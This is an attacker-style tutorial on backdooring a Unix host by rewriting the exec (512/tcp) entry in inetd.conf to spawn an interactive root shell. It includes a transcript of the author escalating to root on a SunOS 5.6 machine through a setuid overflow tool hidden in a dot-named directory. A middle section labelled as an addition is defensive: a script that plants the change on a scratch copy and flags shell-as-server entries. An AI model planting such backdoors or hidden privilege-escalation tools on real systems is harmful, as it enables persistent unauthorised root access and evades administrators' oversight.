Using inetd to bind a system backdoor: a worked example

Disclaimer: this article is meant to show enterprise system administrators what to look for when they audit their own systems. Anyone who uses it for any other purpose bears the consequences.

So you finally got root, by guessing passwords, finding holes, overflowing something, and now you want to keep it for later. Heh. Many beginners like to add a root account with an empty password to passwd or shadow (a password backdoor), or just drop a setuid-root program (or a local overflow exploit) somewhere, or bind a port.

The first two are easy for an administrator to find. What I describe here is the third, a less obvious way of binding a port: instead of running its own listener, the backdoor rides on inetd, so between connections there is no extra process in the process table for an administrator to spot. Now to the point.

Once you have root, open inetd.conf and look for a service that inetd already starts. Here I pick port 512 (exec), because it is a stock entry in inetd.conf and so is less likely to catch the administrator's eye. You could also add a new entry on some high port, but any reasonably careful administrator will notice that.

The steps:

With root, vi /etc/inetd.conf and find a service that runs as root, for example exec on port 512. Uncomment it if it is commented out, and change the line to:

exec stream tcp nowait root /bin/sh /bin/sh -i

Make inetd reread its configuration: # kill -HUP {inetd proc id}

That's it. From your own machine you no longer go through telnet with its username and password prompt: connect to port 512 with any TCP client and inetd hands you an interactive root shell. A few caveats on the "no logs" part. The shell is spawned by inetd rather than by login, so nothing is written to utmp/wtmp and `who` and `last` never see the session; that is all "no logs" means here. While a session is open, `ps` shows a `/bin/sh -i` whose parent is inetd; port 512 shows as listening in `netstat -a` exactly as before, since inetd owns the socket either way; the real rexec service on 512 stops working; and if inetd was started with -t (connection tracing), every connection is logged to syslog. An administrator who diffs /etc/inetd.conf against a pristine copy, or simply looks for an entry whose server program is a shell, finds this in seconds.
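To make both sides of this concrete, here is an added example (not from the original article): a POSIX shell script that performs the same edit the article describes, but on a scratch copy of inetd.conf, and then audits the file the way an administrator would, flagging any active entry whose server program is a shell or whose argv[0] does not match the server binary. The sample inetd.conf it writes is constructed, modelled on the Solaris 2.6 file shown later in this article; the function names are my own. It never touches the live /etc/inetd.conf and never signals inetd.

```shell
#!/bin/sh
# Added example. Works on a text file only: plants the article's exec/512
# change on a scratch copy of inetd.conf, then audits the copy for it.

WORK=${TMPDIR:-/tmp}/inetd.conf.example.$$

# Constructed sample, modelled on a stock Solaris 2.6 inetd.conf.
# Fields: service socket_type proto flags user server_pathname args...
write_sample_conf() {
  cat > "$1" <<'EOF'
# constructed sample inetd.conf
ftp     stream  tcp     nowait  root    /usr/sbin/in.ftpd       in.ftpd
telnet  stream  tcp     nowait  root    /usr/sbin/in.telnetd    in.telnetd
shell   stream  tcp     nowait  root    /usr/sbin/in.rshd       in.rshd
login   stream  tcp     nowait  root    /usr/sbin/in.rlogind    in.rlogind
exec    stream  tcp     nowait  root    /usr/sbin/in.rexecd     in.rexecd
finger  stream  tcp     nowait  nobody  /usr/sbin/in.fingerd    in.fingerd
time    stream  tcp     nowait  root    internal
#tftp   dgram   udp     wait    root    /usr/sbin/in.tftpd      in.tftpd -s /tftpboot
EOF
}

# The article's edit: point the exec (512/tcp) entry at an interactive root
# shell. Rewrites the file named in $1 in place.
plant_exec_backdoor() {
  sed 's|^exec[[:space:]].*|exec stream tcp nowait root /bin/sh /bin/sh -i|' "$1" > "$1.new" \
    && mv "$1.new" "$1"
}

# True when $1 is one of the shells a backdoored entry would name.
is_shell_path() {
  case "$1" in
    /bin/sh|/bin/ksh|/bin/csh|/bin/bash|/sbin/sh|/usr/bin/sh|/usr/bin/ksh|/usr/bin/csh|/usr/bin/bash)
      return 0 ;;
    *)
      return 1 ;;
  esac
}

# Audit: prints "<service> <reason> <detail>" for every active (uncommented)
# entry whose server program is a shell, or whose argv[0] differs from the
# server binary's basename. The second is a hint worth a look, not proof.
audit_inetd() {
  while read -r svc stype proto flags user server args; do
    case "$svc" in ''|'#'*) continue ;; esac   # blank lines and comments
    [ "$server" = internal ] && continue        # built into inetd, no program
    if is_shell_path "$server"; then
      echo "$svc shell-as-server $server"
      continue
    fi
    argv0=${args%% *}
    if [ -n "$argv0" ] && [ "$argv0" != "${server##*/}" ] && [ "$argv0" != "$server" ]; then
      echo "$svc argv0-mismatch $server $argv0"
    fi
  done < "$1"
}

# Number of findings for the file named in $1.
count_findings() {
  audit_inetd "$1" | wc -l | tr -d ' '
}

# Stand-alone run: the clean sample audits clean; after the edit the
# exec entry is reported as "exec shell-as-server /bin/sh".
write_sample_conf "$WORK"
echo "before: $(count_findings "$WORK") finding(s)"
plant_exec_backdoor "$WORK"
echo "after:"
audit_inetd "$WORK"
rm -f "$WORK"
```

Run it against the real file with `audit_inetd /etc/inetd.conf` after sourcing the functions. The shell check is the one that catches this article's trick; the argv[0] check is there because an attacker who keeps the real in.rexecd name in the args column but swaps the server path still has to name the binary somewhere.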

An example:

Here is a full run of me doing it, start to finish:

SunOS 5.6

login: eagle
Password:
Sun Microsystems Inc. SunOS 5.6 Generic August 1997
You have new mail.
sdns% cd /usr/ucb/.../.../
sdns% sys (sys is a setuid local-overflow program I had left here earlier)

(now root)

#more /etc/inetd.conf

#ident "@(#)inetd.conf 1.27 96/09/24 SMI" /* SVr4.0 1.5 */
#
# Configuration file for inetd(1M). See inetd.conf(4).
#
# To re-configure the running inetd process, edit this file, then
# send the inetd process a SIGHUP.
#
# Syntax for socket-based Internet services:
# <service_name> <socket_type> <proto> <flags> <user> <server_pathname> <args>
#
# Syntax for TLI-based Internet services:
#
# <service_name> tli <proto> <flags> <user> <server_pathname> <args>
#
# Ftp and telnet are standard Internet services.
#
ftp stream tcp nowait root /usr/sbin/in.ftpd in.ftpd
telnet stream tcp nowait root /usr/sbin/in.telnetd in.telnetd
#
# Tnamed serves the obsolete IEN-116 name server protocol.
#
name dgram udp wait root /usr/sbin/in.tnamed in.tnamed
#
# Shell, login, exec, comsat and talk are BSD protocols.
#
shell stream tcp nowait root /usr/sbin/in.rshd in.rshd
login stream tcp nowait root /usr/sbin/in.rlogind in.rlogind
exec stream tcp nowait root /usr/sbin/in.rexecd in.execd
comsat dgram udp wait root /usr/sbin/in.comsat in.comsat
talk dgram udp wait root /usr/sbin/in.talkd in.talkd
#
# Must run as root (to read /etc/shadow); "-n" turns off logging in utmp/wtmp.
#
uucp stream tcp nowait root /usr/sbin/in.uucpd in.uucpd
#
# Tftp service is provided primarily for booting. Most sites run this
# only on machines acting as "boot servers."
#
#tftp dgram udp wait root /usr/sbin/in.tftpd in.tftpd -s /tftpboot
#
# Finger, systat and netstat give out user information which may be
# valuable to potential "system crackers." Many sites choose to disable
# some or all of these services to improve security.
#
finger stream tcp nowait nobody /usr/sbin/in.fingerd in.fingerd
#systat stream tcp nowait root /usr/bin/ps ps -ef
#netstat stream tcp nowait root /usr/bin/netstat netstat -f inet
#
# Time service is used for clock synchronization.
#
time stream tcp nowait root internal
time dgram udp wait root internal
#
# Echo, discard, daytime, and chargen are used primarily for testing.
#
echo stream tcp nowait root internal
echo dgram udp wait root internal
discard stream tcp nowait root internal
discard dgram udp wait root internal
daytime stream tcp nowait root internal
daytime dgram udp wait root internal
chargen stream tcp nowait root internal
chargen dgram udp wait root internal
#
#
# RPC services syntax:
# <rpc_prog>/<vers> <endpoint-type> rpc/<proto> <flags> <user> \
# <pathname> <args>
#
# <end